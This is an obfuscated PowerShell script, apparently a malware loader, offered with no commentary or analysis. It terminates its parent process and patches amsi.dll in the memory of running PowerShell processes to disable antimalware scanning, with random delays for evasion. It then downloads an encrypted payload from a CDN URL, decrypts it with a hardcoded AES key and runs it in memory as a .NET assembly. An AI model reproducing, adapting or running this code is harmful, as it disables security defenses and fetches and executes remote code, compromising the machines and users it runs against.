$iris = (Get-CimInstance Win32_Process -Filter "ProcessId=$PID").ParentProcessId if ($iris) { Stop-Process -Id $iris -Force } Add-Type @" using System; using System.Runtime.InteropServices; public class K { [DllImport("kernel32.dll", SetLastError=true)] public static extern bool VirtualProtectEx(IntPtr h, IntPtr a, uint s, uint p, out uint o); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool ReadProcessMemory(IntPtr h, IntPtr a, byte[] b, int s, out IntPtr r); [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr OpenProcess(uint a, bool i, int p); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool WriteProcessMemory(IntPtr h, IntPtr a, byte[] b, uint s, out int w); } "@ function KJhbhb { Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $tide = Get-Process -Name "powershell" -ErrorAction SilentlyContinue if (!$tide) { exit 1 } foreach ($ledge in $tide) { Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $book = [K]::OpenProcess(0x001F0FFF, $mosaic, $ledge.Id) $vista = $null $keel = 0 foreach ($flower in $ledge.Modules) { if ($flower.ModuleName -eq "amsi.dll") { $vista = $flower.BaseAddress $keel = $flower.ModuleMemorySize break } } if (!$vista) { continue } $ridge = [byte[]]::new(32) $dream = [byte[]]@(0x4c,0x8b,0xdc,0x49,0x89,0x5b,0x08,0x49,0x89,0x6b,0x10,0x49,0x89,0x73,0x18,0x57,0x41,0x56,0x41,0x57,0x48,0x83,0xec,0x70,0x4d,0x8b,0xf9,0x41,0x8b,0xf8,0x48,0x8b) $bridge = $null for ($kestrel = 0; $kestrel -le $keel; $kestrel += 32) { $whisper = [IntPtr]::Zero [K]::ReadProcessMemory($book, [IntPtr]($vista.ToInt64() + $kestrel), $ridge, 32, [ref]$whisper) $house = $yarrow for ($rose = 0; $rose -lt 32; $rose++) { if ($ridge[$rose] -ne $dream[$rose]) { $house = $mosaic; break } } if ($house) { $bridge = [IntPtr]($vista.ToInt64() + $kestrel); break } } if (!$bridge) { continue } Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $heath = 0 [K]::VirtualProtectEx($book, $vista, 0x1000, 0x40, [ref]$heath) $nexus = [byte[]]@(0x31,0xff,0x90) $tundra = 0 [K]::WriteProcessMemory($book, [IntPtr]($bridge.ToInt64() + 0x1b), $nexus, 3, [ref]$tundra) } } KJhbhb #ujhifsfiohdf setx BUILD "Titan" $ember = "https://sdfas-cloud.b-cdn.net/wqegfasd.bin" $lark = [System.Net.WebClient]::new() $fog = $lark.DownloadData($ember) $yew = [System.Security.Cryptography.Aes]::Create() $vale = [System.Text.Encoding]::UTF8.GetBytes("X7b9PqT3mW2kL8vR5nY6zJ1hF4tD9cM0") $nook = [System.Text.Encoding]::UTF8.GetBytes("K9mW3pQ7tR2vL8nY") $yew.Key = $vale $yew.IV = $nook $ocean = $yew.CreateDecryptor() $kale = $ocean.TransformFinalBlock($fog, 0, $fog.Length) $wheat = [System.Reflection.Assembly]::Load($kale) $xenon = $wheat.EntryPoint $xenon.Invoke($null, $null) #ujhifsfiohdf